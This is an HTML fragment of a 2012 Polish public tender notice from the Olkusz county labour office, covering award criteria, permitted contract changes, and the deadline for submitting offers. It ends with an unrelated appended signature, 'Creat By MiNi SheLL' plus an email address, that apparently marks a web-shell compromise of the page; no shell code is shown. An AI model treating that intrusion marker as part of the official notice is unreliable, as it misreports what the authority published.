<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Posiadanie certyfikatu jakości usług - 5</li>
<li>3 - Ilość przeprowadzonych szkoleń o tematyce objętej przedmiotem zamówienia - 25</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany  postanowień  umowy, której wzór stanowi załącznik nr 10 a do SIWZ  w przypadku: 1) zmiany  terminu przeprowadzenia szkolenia  - w obrębie 1- go miesiąca  (za zgodą Zamawiającego ),
2)  zmiany Wykładowcy wynikającej  z przyczyn losowych, pod warunkiem zabezpieczenia innej osoby zdolnej do realizacji zamówienia, spełniającej wymagania określone w Rozdziale V pkt 4  SIWZ (za zgodą Zamawiającego ),
3) zmiany miejsca szkolenia, pod warunkiem zabezpieczenia miejsca spełniającego wymogi określone w Rozdziale III pkt 12, 13 i 14. SIWZ ( za zgodą Zamawiającego)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-olkusz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy, ul. Minkiewicza 2, 32-300 Olkusz, (Sekretariat - pokój nr 8).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2012 godzina 10:00, miejsce: Powiatowy Urząd Pracy, ul. Minkiewicza 2, 32-300 Olkusz, (Sekretariat - pokój nr 8).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com